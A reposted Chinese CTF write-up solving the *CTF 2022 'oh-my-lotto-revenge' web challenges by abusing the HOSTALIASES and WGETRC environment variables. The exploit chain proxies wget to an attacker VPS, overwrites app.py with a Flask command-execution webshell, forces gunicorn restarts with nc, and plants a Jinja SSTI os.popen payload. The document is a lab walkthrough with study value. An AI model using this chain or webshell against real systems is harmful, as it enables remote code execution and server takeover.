1. 首页
  2. 文章中心
  3. ctf

【*CTF/starctf oh-my-lotto-revenge复盘】0x00 前言oh-my-lotto && revenge0x01 rethink

106 阅读 0 评论
我是靠谱客的博主 过时学姐,最近开发中收集的这篇文章主要介绍【*CTF/starctf oh-my-lotto-revenge复盘】0x00 前言oh-my-lotto && revenge0x01 rethink,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

1NDEX

  • 0x00 前言
  • oh-my-lotto && revenge
      • 官方预期解(两道通杀)
        • brain.md
      • 第一题wgetrc非预期
        • 至此可出brain.md
      • 第二题非预期
  • 0x01 rethink

0x00 前言

回来复盘一下多种解法

oh-my-lotto && revenge

官方预期解(两道通杀)

HOSTALIASES可以设置shell的hosts加载文件

http://www.scratchbox.org/documentation/general/tutorials/glibcenv.html

参数

 --content-disposition       honor the Content-Disposition header when
                                     choosing local file names (EXPERIMENTAL)		
-N,  --timestamping              don't re-retrieve files unless newer than

请求的保存文件名将由服务方提供方指定的文件名决定
可对本地文件进行覆盖

brain.md

1.forecast上传host文件,将lotto指向自己的vps
2.修改环境变量HOSTALIASES,shell host加载我们上传的forecast.txt
3.vps挂恶意app.py回传覆盖原本的app.py 继而直接执行命令

VPS起个文件传输服务
filename一定要指定为app.py

from flask import Flask, make_response
import secrets

app = Flask(__name__)

@app.route("/")
def index():
    with open('app.py',encoding='utf-8') as f:    
      r = f.read()
      response = make_response(r)
      response.headers['Content-Type'] = 'text/plain'
      response.headers['Content-Disposition'] = 'attachment; filename=app.py'
      return response

if __name__ == "__main__":
    app.run(debug=True, host='0.0.0.0', port=80)

app.py

from flask import Flask,request
import os


app = Flask(__name__)
@app.route("/test", methods=['GET'])
def test():
    a = request.args.get('a')
    a = os.popen(a)
    a = a.read()
    return str(a)

if __name__ == "__main__":
    app.run(debug=True,host='0.0.0.0', port=8080)

嫖了freenom
host.txt

lotto your-domain
forecast上传host
set key value
lotto即可
在这里插入图片描述
可以看到app.py已经被覆盖了
在这里插入图片描述
在这里插入图片描述
but gunicorn 不是热加载
但gunicorn使用一种pre-forked worker的机制,当某一个worker超时以后,就会让gunicorn重启该worker,让worker超时的POC如下

timeout 50 nc ip port &
timeout 50 nc ip port &
timeout 50 nc ip port

覆盖完app.py后本地跑一下这个poc即可

在这里插入图片描述
不得不感叹官方解确实妙

第一题wgetrc非预期

如何找到命令源码包

  1. https://command-not-found.com/ 找到包名
  2. https://www.gnu.org/software/wget/
    在这里插入图片描述
    or apt-get source wget

源码包翻看可利用的环境变量
在这里插入图片描述
wgetrc可用于加载http代理

https://www.gnu.org/software/wget/manual/wget.html
在这里插入图片描述
在这里插入图片描述

传一个forecast试试

http_proxy = ip:7777

key: WGETRC
value: /app/guess/forecast.txt
在这里插入图片描述

至此可出brain.md

1.上传http_proxy 将请求转发到我们的vps上
2.vps修改host lotto->127.0.0.1,vps80端口起个服务直接返回我们上传的文件即可
起个evil.py

from flask import Flask, make_response
import secrets

app = Flask(__name__)

@app.route("/")
def index():
    with open('test.txt',encoding='utf-8') as f:    
      r = f.read()
      response = make_response(r)
      response.headers['Content-Type'] = 'text/plain'
      response.headers['Content-Disposition'] = 'attachment; filename=lotto_result.txt'
      return response

if __name__ == "__main__":
    app.run(debug=True, host='0.0.0.0', port=80)

上传test.txt

http_proxy = ip:80

设置WGETRC
直接lotto
在这里插入图片描述
在这里插入图片描述

第二题非预期

接上文wgetrc代理到我们自己的服务器
可以通过output_document指定输出位置
那么就能覆盖 template/index.html 或者直接覆盖app.py
在这里插入图片描述
覆盖app.py已做过演示
test一下ssti

from flask import Flask, make_response
import secrets

app = Flask(__name__)

@app.route("/")
def index():
    with open('index.html',encoding='utf-8') as f:    
      r = f.read()
      response = make_response(r)
      response.headers['Content-Type'] = 'text/plain'
      response.headers['Content-Disposition'] = 'attachment; filename=index.html'
      return response

if __name__ == "__main__":
    app.run(debug=True, host='0.0.0.0', port=80)

forecast.txt

http_proxy = ip:80
output_document = template/index.html

index.html

{{config.__class__.__init__.__globals__['os'].popen('evil command').read()}}

在这里插入图片描述
可以看到覆盖了
在这里插入图片描述

参考y4✌

https://y4tacker.github.io/2022/04/18/year/2022/4/2022-CTF-Web/#oh-my-lotto-revenge

0x01 rethink

抓紧复盘不摸鱼!

最后

以上就是过时学姐为你收集整理的【*CTF/starctf oh-my-lotto-revenge复盘】0x00 前言oh-my-lotto && revenge0x01 rethink的全部内容,希望文章能够帮你解决【*CTF/starctf oh-my-lotto-revenge复盘】0x00 前言oh-my-lotto && revenge0x01 rethink所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(70)

相关文章

*CTF2022 - Weboh-my-grafanaoh-my-noteprooh-my-lotto
*CTF2022 - Weboh-my-grafanaoh-my-noteprooh-my-lotto
GFCTF2021 部分WP
GFCTF2021 部分WP
怎么把计算机磁盘解密,Win10系统下怎样对磁盘进行加密、解密?Win10系统加密、解密磁盘图文教程...
怎么把计算机磁盘解密,Win10系统下怎样对磁盘进行加密、解密?Win10系统加密、解密磁盘图文教程...
Bitlocker使用及原理
Bitlocker使用及原理
【*CTF/starctf oh-my-lotto-revenge复盘】0x00 前言oh-my-lotto && revenge0x01 rethink
【*CTF/starctf oh-my-lotto-revenge复盘】0x00 前言oh-my-lotto && revenge0x01 rethink
1st XTUCTF部分Writeup1st XTUCTFMiscWeb
1st XTUCTF部分Writeup1st XTUCTFMiscWeb
windows解密bitlocker【2】密码读取
windows解密bitlocker【2】密码读取
BitLocker 秘钥如何获取
BitLocker 秘钥如何获取

评论列表共有 0 条评论

立即
投稿
返回
顶部